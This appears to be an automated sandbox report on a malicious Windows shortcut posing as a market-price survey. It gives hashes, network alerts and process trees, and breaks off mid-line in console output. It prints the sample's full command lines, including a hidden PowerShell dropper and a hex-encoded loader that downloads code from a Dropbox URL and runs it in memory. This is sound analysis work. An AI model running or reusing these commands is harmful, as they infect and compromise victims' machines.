Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	Oct. 30, 2023, 5:45 p.m.	Oct. 30, 2023, 5:48 p.m.

Size	50.6MB
Type	MS Windows shortcut, Has Description string, Has command line arguments, Icon number=1, ctime=Sun Dec 31 15:32:08 1600, mtime=Sun Dec 31 15:32:08 1600, atime=Sun Dec 31 15:32:08 1600, length=0, window=hidenormalshowminimized
MD5	`d1dc2db2956803de7eef7a76a6ac5cb2`
SHA256	`729faf7388908dc19ca5a0c163da1a7089ca4848a1160cf84aac6585383da849`
CRC32	`C3783ACF`
ssdeep	`768:R5NQbGLEAE34m0WqKEBU837vnh8GpZocPOmRIsL6gvQQ9CH:R99E34KcU83758Gpm5mGd49M`
Yara	lnk_file_format - Microsoft Windows Shortcut File Format Antivirus - Contains references to security software Lnk_Format_Zero - LNK Format Generic_Malware_Zero - Generic Malware

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "haKxmscgXfAf" "C:\Users\test22\AppData\Local\Temp\주요도시 시장가격 조사2023.lnk"
3000
- cmd.exe "C:\Windows\SysWOW64\cmd.exe" /k echo SET a=power>C:\Users\Public\282310.bat&&echo SET b=shell.exe>>C:\Users\Public\282310.bat&&echo SET M=%a%%b%>>C:\Users\Public\282310.bat&&echo call %M% -windowstyle hidden "$dirPath=Get-Location;if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\test22\AppData\Local\Temp'}; $lnkPath=Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq 0x032A1EB6} | Select-Object -ExpandProperty FullName; $lnkFile=New-Object System.IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$lnkFile.Seek(0x00001304, [System.IO.SeekOrigin]::Begin);$pdfFile=New-Object byte[] 0x00008DA6;$lnkFile.Read($pdfFile, 0, 0x00008DA6);$PdfPath = $lnkPath.Replace('.lnk','.xlsx');sc $PdfPath $pdfFile -Encoding Byte;& $PdfPath;$lnkFile.Seek(0x0000A0AA,[System.IO.SeekOrigin]::Begin);$exeFile=New-Object byte[] 0x00000D18;$lnkFile.Read($exeFile, 0, 0x00000D18);$exePath=$env:public+'\'+'281023.bat';sc $exePath $exeFile -Encoding Byte;& $exePath;remove-item -path $exePath -force;$lnkFile.Close();remove-item -path $lnkPath -force;">>C:\Users\Public\282310.bat&& start /min C:\Users\Public\282310.bat&&exit
  932
  - cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\282310.bat
    2272
    - powershell.exe powershell.exe -windowstyle hidden "$dirPath=Get-Location;if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\test22\AppData\Local\Temp'}; $lnkPath=Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq 0x032A1EB6} | Select-Object -ExpandProperty FullName; $lnkFile=New-Object System.IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$lnkFile.Seek(0x00001304, [System.IO.SeekOrigin]::Begin);$pdfFile=New-Object byte[] 0x00008DA6;$lnkFile.Read($pdfFile, 0, 0x00008DA6);$PdfPath = $lnkPath.Replace('.lnk','.xlsx');sc $PdfPath $pdfFile -Encoding Byte;& $PdfPath;$lnkFile.Seek(0x0000A0AA,[System.IO.SeekOrigin]::Begin);$exeFile=New-Object byte[] 0x00000D18;$lnkFile.Read($exeFile, 0, 0x00000D18);$exePath=$env:public+'\'+'281023.bat';sc $exePath $exeFile -Encoding Byte;& $exePath;remove-item -path $exePath -force;$lnkFile.Close();remove-item -path $lnkPath -force;"
      2408
      - EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde
        1624
      - cmd.exe cmd /c ""C:\Users\Public\281023.bat""
        1728
        
        cmd.exe c:\\Windows\\SysWOW64\\cmd.exe /c for /f "tokens=*" %a in ('dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od') do call %a -windowstyle hidden -command "$red ="$yellow="""5B4E65742E53657276696365506F696E744D616E616765725D3A3A536563757269747950726F746F636F6C3D5B456E756D5D3A3A546F4F626A656374285B4E65742E536563757269747950726F746F636F6C547970655D2C2033303732293B2461613D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E7450747220476C6F62616C416C6C6F632875696E7420622C75696E742063293B273B24623D4164642D54797065202D4D656D626572446566696E6974696F6E20246161202D4E616D6520224141412220202D50617373546872753B2461626162203D20275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20626F6F6C205669727475616C50726F7465637428496E7450747220612C75696E7420622C75696E7420632C6F757420496E745074722064293B273B246161623D4164642D54797065202D4D656D626572446566696E6974696F6E202461626162202D4E616D65202241414222202D50617373546872753B2463203D204E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E743B24643D2268747470733A2F2F646C2E64726F70626F7875736572636F6E74656E742E636F6D2F73636C2F66692F68377035616561726B627136726E62326F683633332F32303233313032385F73656C63612E7A69703F726C6B65793D38676D6E6E6672657A7A32766E6E64737231637A373831637626646C3D30223B2462623D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722043726561746554687265616428496E7450747220612C75696E7420622C496E7450747220632C496E7450747220642C75696E7420652C496E745074722066293B273B246363633D4164642D54797065202D4D656D626572446566696E6974696F6E20246262202D4E616D65202242424222202D50617373546872753B246464643D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722057616974466F7253696E676C654F626A65637428496E7450747220612C75696E742062293B273B246666663D4164642D54797065202D4D656D626572446566696E6974696F6E2024646464202D4E616D65202244444422202D50617373546872753B24653D3131323B646F207B2020747279207B2024632E486561646572735B22757365722D6167656E74225D203D2022636F6E6E6E656374696E672E2E2E223B24786D7077343D24632E446F776E6C6F616444617461282464293B247830203D2024623A3A476C6F62616C416C6C6F63283078303034302C2024786D7077342E4C656E6774682B3078313030293B246F6C64203D20303B246161623A3A5669727475616C50726F74656374282478302C2024786D7077342E4C656E6774682B30783130302C20307834302C205B7265665D246F6C64293B666F7220282468203D20313B2468202D6C742024786D7077342E4C656E6774683B24682B2B29207B5B53797374656D2E52756E74696D652E496E7465726F7053657276696365732E4D61727368616C5D3A3A577269746542797465282478302C2024682D312C202824786D7077345B24685D202D62786F722024786D7077345B305D2920293B7D3B7472797B7468726F7720313B7D63617463687B2468616E646C653D246363633A3A43726561746554687265616428302C302C2478302C302C302C30293B246666663A3A57616974466F7253696E676C654F626A656374282468616E646C652C203530302A31303030293B7D3B24653D3232323B7D63617463687B736C6565702031313B24653D3131323B7D7D7768696C65282465202D657120313132293B""";$chemble="""""";for($i=0;$i -le $yellow.Length-2;$i=$i+2){$MMOMM=$yellow[$i]+$yellow[$i+1];$chemble= $chemble+[char]([convert]::toint16($MMOMM,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($chemble));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($red));while(true){}"
        1472
        
        cmd.exe C:\Windows\system32\cmd.exe /c dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od
        2572
        
        powershell.exe C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden -command "$red ="$yellow="""5B4E65742E53657276696365506F696E744D616E616765725D3A3A536563757269747950726F746F636F6C3D5B456E756D5D3A3A546F4F626A656374285B4E65742E536563757269747950726F746F636F6C547970655D2C2033303732293B2461613D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E7450747220476C6F62616C416C6C6F632875696E7420622C75696E742063293B273B24623D4164642D54797065202D4D656D626572446566696E6974696F6E20246161202D4E616D6520224141412220202D50617373546872753B2461626162203D20275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20626F6F6C205669727475616C50726F7465637428496E7450747220612C75696E7420622C75696E7420632C6F757420496E745074722064293B273B246161623D4164642D54797065202D4D656D626572446566696E6974696F6E202461626162202D4E616D65202241414222202D50617373546872753B2463203D204E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E743B24643D2268747470733A2F2F646C2E64726F70626F7875736572636F6E74656E742E636F6D2F73636C2F66692F68377035616561726B627136726E62326F683633332F32303233313032385F73656C63612E7A69703F726C6B65793D38676D6E6E6672657A7A32766E6E64737231637A373831637626646C3D30223B2462623D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722043726561746554687265616428496E7450747220612C75696E7420622C496E7450747220632C496E7450747220642C75696E7420652C496E745074722066293B273B246363633D4164642D54797065202D4D656D626572446566696E6974696F6E20246262202D4E616D65202242424222202D50617373546872753B246464643D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722057616974466F7253696E676C654F626A65637428496E7450747220612C75696E742062293B273B246666663D4164642D54797065202D4D656D626572446566696E6974696F6E2024646464202D4E616D65202244444422202D50617373546872753B24653D3131323B646F207B2020747279207B2024632E486561646572735B22757365722D6167656E74225D203D2022636F6E6E6E656374696E672E2E2E223B24786D7077343D24632E446F776E6C6F616444617461282464293B247830203D2024623A3A476C6F62616C416C6C6F63283078303034302C2024786D7077342E4C656E6774682B3078313030293B246F6C64203D20303B246161623A3A5669727475616C50726F74656374282478302C2024786D7077342E4C656E6774682B30783130302C20307834302C205B7265665D246F6C64293B666F7220282468203D20313B2468202D6C742024786D7077342E4C656E6774683B24682B2B29207B5B53797374656D2E52756E74696D652E496E7465726F7053657276696365732E4D61727368616C5D3A3A577269746542797465282478302C2024682D312C202824786D7077345B24685D202D62786F722024786D7077345B305D2920293B7D3B7472797B7468726F7720313B7D63617463687B2468616E646C653D246363633A3A43726561746554687265616428302C302C2478302C302C302C30293B246666663A3A57616974466F7253696E676C654F626A656374282468616E646C652C203530302A31303030293B7D3B24653D3232323B7D63617463687B736C6565702031313B24653D3131323B7D7D7768696C65282465202D657120313132293B""";$chemble="""""";for($i=0;$i -le $yellow.Length-2;$i=$i+2){$MMOMM=$yellow[$i]+$yellow[$i+1];$chemble= $chemble+[char]([convert]::toint16($MMOMM,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($chemble));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($red));while(true){}"
        1300
        
        csc.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\xj4njtpx.cmdline"
        3040
        
        cvtres.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\test22\AppData\Local\Temp\RES629E.tmp" "c:\Users\test22\AppData\Local\Temp\CSC628D.tmp"
        2772
        
        csc.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\sbjraxxu.cmdline"
        2172
        
        cvtres.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\test22\AppData\Local\Temp\RES6463.tmp" "c:\Users\test22\AppData\Local\Temp\CSC6452.tmp"
        2348
        
        csc.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\qceyv3jp.cmdline"
        1884
        
        cvtres.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\test22\AppData\Local\Temp\RES6638.tmp" "c:\Users\test22\AppData\Local\Temp\CSC6627.tmp"
        2428
        
        csc.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\qwrnexiw.cmdline"
        2524
        
        cvtres.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\test22\AppData\Local\Temp\RES680C.tmp" "c:\Users\test22\AppData\Local\Temp\CSC67FC.tmp"
        2440
explorer.exe C:\Windows\Explorer.EXE
1236

Name	Response	Post-Analysis Lookup
app.documentoffice.club	A 84.32.131.104	84.32.131.104
dl.dropboxusercontent.com	CNAME edge-block-www-env.dropbox-dns.com A 162.125.84.15	162.125.84.15

IP Address	Status	Action
162.125.84.15	Active	Moloch
164.124.101.2	Active	Moloch
84.32.131.104	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.102:49231 -> 162.125.84.15:443	2035593	ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI)	Misc activity
TCP 192.168.56.102:49231 -> 162.125.84.15:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49239 -> 162.125.84.15:443	2035593	ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI)	Misc activity
TCP 192.168.56.102:49228 -> 162.125.84.15:443	2035593	ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI)	Misc activity
TCP 192.168.56.102:49231 -> 162.125.84.15:443	2035593	ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI)	Misc activity
TCP 192.168.56.102:49239 -> 162.125.84.15:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49228 -> 162.125.84.15:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49239 -> 162.125.84.15:443	2035593	ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI)	Misc activity
TCP 192.168.56.102:49228 -> 162.125.84.15:443	2035593	ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI)	Misc activity
TCP 192.168.56.102:49236 -> 162.125.84.15:443	2035593	ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI)	Misc activity
TCP 192.168.56.102:49236 -> 162.125.84.15:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49242 -> 162.125.84.15:443	2035593	ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI)	Misc activity
TCP 192.168.56.102:49236 -> 162.125.84.15:443	2035593	ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI)	Misc activity
TCP 192.168.56.102:49242 -> 162.125.84.15:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49232 -> 162.125.84.15:443	2035593	ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI)	Misc activity
TCP 192.168.56.102:49230 -> 162.125.84.15:443	2035593	ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI)	Misc activity
TCP 192.168.56.102:49232 -> 162.125.84.15:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49230 -> 162.125.84.15:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49242 -> 162.125.84.15:443	2035593	ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI)	Misc activity
TCP 192.168.56.102:49230 -> 162.125.84.15:443	2035593	ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI)	Misc activity
TCP 192.168.56.102:49232 -> 162.125.84.15:443	2035593	ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI)	Misc activity
TCP 192.168.56.102:49241 -> 162.125.84.15:443	2035593	ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI)	Misc activity
TCP 192.168.56.102:49241 -> 162.125.84.15:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49243 -> 162.125.84.15:443	2035593	ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI)	Misc activity
TCP 192.168.56.102:49241 -> 162.125.84.15:443	2035593	ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI)	Misc activity
TCP 192.168.56.102:49243 -> 162.125.84.15:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49234 -> 162.125.84.15:443	2035593	ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI)	Misc activity
TCP 192.168.56.102:49243 -> 162.125.84.15:443	2035593	ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI)	Misc activity
TCP 192.168.56.102:49234 -> 162.125.84.15:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49233 -> 162.125.84.15:443	2035593	ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI)	Misc activity
TCP 192.168.56.102:49245 -> 162.125.84.15:443	2035593	ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI)	Misc activity
TCP 192.168.56.102:49234 -> 162.125.84.15:443	2035593	ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI)	Misc activity
TCP 192.168.56.102:49233 -> 162.125.84.15:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49245 -> 162.125.84.15:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49233 -> 162.125.84.15:443	2035593	ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI)	Misc activity
TCP 192.168.56.102:49245 -> 162.125.84.15:443	2035593	ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI)	Misc activity
TCP 192.168.56.102:49235 -> 162.125.84.15:443	2035593	ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI)	Misc activity
TCP 192.168.56.102:49235 -> 162.125.84.15:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49237 -> 162.125.84.15:443	2035593	ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI)	Misc activity
TCP 192.168.56.102:49235 -> 162.125.84.15:443	2035593	ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI)	Misc activity
TCP 192.168.56.102:49237 -> 162.125.84.15:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49247 -> 162.125.84.15:443	2035593	ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI)	Misc activity
TCP 192.168.56.102:49247 -> 162.125.84.15:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49237 -> 162.125.84.15:443	2035593	ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI)	Misc activity
TCP 192.168.56.102:49247 -> 162.125.84.15:443	2035593	ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI)	Misc activity
TCP 192.168.56.102:49244 -> 162.125.84.15:443	2035593	ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI)	Misc activity
TCP 192.168.56.102:49244 -> 162.125.84.15:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49240 -> 162.125.84.15:443	2035593	ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI)	Misc activity
TCP 192.168.56.102:49244 -> 162.125.84.15:443	2035593	ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI)	Misc activity
TCP 192.168.56.102:49240 -> 162.125.84.15:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49240 -> 162.125.84.15:443	2035593	ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI)	Misc activity
TCP 192.168.56.102:49227 -> 162.125.84.15:443	2035593	ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI)	Misc activity
TCP 192.168.56.102:49227 -> 162.125.84.15:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49227 -> 162.125.84.15:443	2035593	ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI)	Misc activity
TCP 192.168.56.102:49238 -> 162.125.84.15:443	2035593	ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI)	Misc activity
TCP 192.168.56.102:49238 -> 162.125.84.15:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49238 -> 162.125.84.15:443	2035593	ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI)	Misc activity
TCP 192.168.56.102:49248 -> 162.125.84.15:443	2035593	ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI)	Misc activity
TCP 192.168.56.102:49248 -> 162.125.84.15:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49248 -> 162.125.84.15:443	2035593	ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI)	Misc activity
TCP 192.168.56.102:49239 -> 162.125.84.15:443	2035593	ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI)	Misc activity
TCP 192.168.56.102:49245 -> 162.125.84.15:443	2035593	ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI)	Misc activity
TCP 192.168.56.102:49232 -> 162.125.84.15:443	2035593	ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI)	Misc activity
TCP 192.168.56.102:49235 -> 162.125.84.15:443	2035593	ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI)	Misc activity
TCP 192.168.56.102:49231 -> 162.125.84.15:443	2035593	ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI)	Misc activity
TCP 192.168.56.102:49236 -> 162.125.84.15:443	2035593	ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI)	Misc activity
TCP 192.168.56.102:49241 -> 162.125.84.15:443	2035593	ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI)	Misc activity
TCP 192.168.56.102:49237 -> 162.125.84.15:443	2035593	ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI)	Misc activity
TCP 192.168.56.102:49233 -> 162.125.84.15:443	2035593	ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI)	Misc activity
TCP 192.168.56.102:49238 -> 162.125.84.15:443	2035593	ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI)	Misc activity
TCP 192.168.56.102:49227 -> 162.125.84.15:443	2035593	ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI)	Misc activity
TCP 192.168.56.102:49230 -> 162.125.84.15:443	2035593	ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI)	Misc activity
TCP 192.168.56.102:49234 -> 162.125.84.15:443	2035593	ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI)	Misc activity
TCP 192.168.56.102:49242 -> 162.125.84.15:443	2035593	ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI)	Misc activity
TCP 192.168.56.102:49247 -> 162.125.84.15:443	2035593	ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI)	Misc activity
TCP 192.168.56.102:49244 -> 162.125.84.15:443	2035593	ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI)	Misc activity
TCP 192.168.56.102:49228 -> 162.125.84.15:443	2035593	ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI)	Misc activity
TCP 192.168.56.102:49248 -> 162.125.84.15:443	2035593	ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI)	Misc activity
TCP 192.168.56.102:49243 -> 162.125.84.15:443	2035593	ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI)	Misc activity
TCP 192.168.56.102:49240 -> 162.125.84.15:443	2035593	ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI)	Misc activity

Suricata TLS

No Suricata TLS

Queries for the computername (13 events)

Time & API	Arguments	Status	Return
GetComputerNameW Oct. 30, 2023, 5:45 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 30, 2023, 5:45 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 30, 2023, 5:45 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 30, 2023, 5:45 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Oct. 30, 2023, 5:45 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 30, 2023, 5:45 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 30, 2023, 5:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 30, 2023, 5:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 30, 2023, 5:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 30, 2023, 5:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Oct. 30, 2023, 5:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 30, 2023, 5:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 30, 2023, 5:46 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (21 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Oct. 30, 2023, 5:45 p.m.			0	0
IsDebuggerPresent Oct. 30, 2023, 5:46 p.m.			0	0
IsDebuggerPresent Oct. 30, 2023, 5:46 p.m.			0	0
IsDebuggerPresent Oct. 30, 2023, 5:46 p.m.			0	0
IsDebuggerPresent Oct. 30, 2023, 5:46 p.m.			0	0
IsDebuggerPresent Oct. 30, 2023, 5:46 p.m.			0	0
IsDebuggerPresent Oct. 30, 2023, 5:46 p.m.			0	0
IsDebuggerPresent Oct. 30, 2023, 5:46 p.m.			0	0
IsDebuggerPresent Oct. 30, 2023, 5:46 p.m.			0	0
IsDebuggerPresent Oct. 30, 2023, 5:46 p.m.			0	0
IsDebuggerPresent Oct. 30, 2023, 5:46 p.m.			0	0
IsDebuggerPresent Oct. 30, 2023, 5:46 p.m.			0	0
IsDebuggerPresent Oct. 30, 2023, 5:46 p.m.			0	0
IsDebuggerPresent Oct. 30, 2023, 5:46 p.m.			0	0
IsDebuggerPresent Oct. 30, 2023, 5:46 p.m.			0	0
IsDebuggerPresent Oct. 30, 2023, 5:46 p.m.			0	0
IsDebuggerPresent Oct. 30, 2023, 5:46 p.m.			0	0
IsDebuggerPresent Oct. 30, 2023, 5:46 p.m.			0	0
IsDebuggerPresent Oct. 30, 2023, 5:46 p.m.			0	0
IsDebuggerPresent Oct. 30, 2023, 5:46 p.m.			0	0
IsDebuggerPresent Oct. 30, 2023, 5:46 p.m.			0	0

Command line console output was observed (50 out of 63 events)

Time & API	Arguments	Status	Return
WriteConsoleW Oct. 30, 2023, 5:45 p.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW Oct. 30, 2023, 5:45 p.m.	buffer: SET console_handle: 0x00000007	1	1
WriteConsoleW Oct. 30, 2023, 5:45 p.m.	buffer: a=power console_handle: 0x00000007	1	1
WriteConsoleW Oct. 30, 2023, 5:45 p.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW Oct. 30, 2023, 5:45 p.m.	buffer: SET console_handle: 0x00000007	1	1
WriteConsoleW Oct. 30, 2023, 5:45 p.m.	buffer: b=shell.exe console_handle: 0x00000007	1	1
WriteConsoleW Oct. 30, 2023, 5:45 p.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW Oct. 30, 2023, 5:45 p.m.	buffer: SET console_handle: 0x00000007	1	1
WriteConsoleW Oct. 30, 2023, 5:45 p.m.	buffer: M=powershell.exe console_handle: 0x00000007	1	1
WriteConsoleW Oct. 30, 2023, 5:45 p.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW Oct. 30, 2023, 5:45 p.m.	buffer: call console_handle: 0x00000007	1	1
WriteConsoleW Oct. 30, 2023, 5:45 p.m.	buffer: powershell.exe -windowstyle hidden "$dirPath=Get-Location;if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\test22\AppData\Local\Temp'}; $lnkPath=Get-ChildItem -Path $dirPath -Recurse *.lnk \| where-object {$_.length -eq 0x032A1EB6} \| Select-Object -ExpandProperty FullName; $lnkFile=New-Object System.IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$lnkFile.Seek(0x00001304, [System.IO.SeekOrigin]::Begin);$pdfFile=New-Object byte[] 0x00008DA6;$lnkFile.Read($pdfFile, 0, 0x00008DA6);$PdfPath = $lnkPath.Replace('.lnk','.xlsx');sc $PdfPath $pdfFile -Encoding Byte;& $PdfPath;$lnkFile.Seek(0x0000A0AA,[System.IO.SeekOrigin]::Begin);$exeFile=New-Object byte[] 0x00000D18;$lnkFile.Read($exeFile, 0, 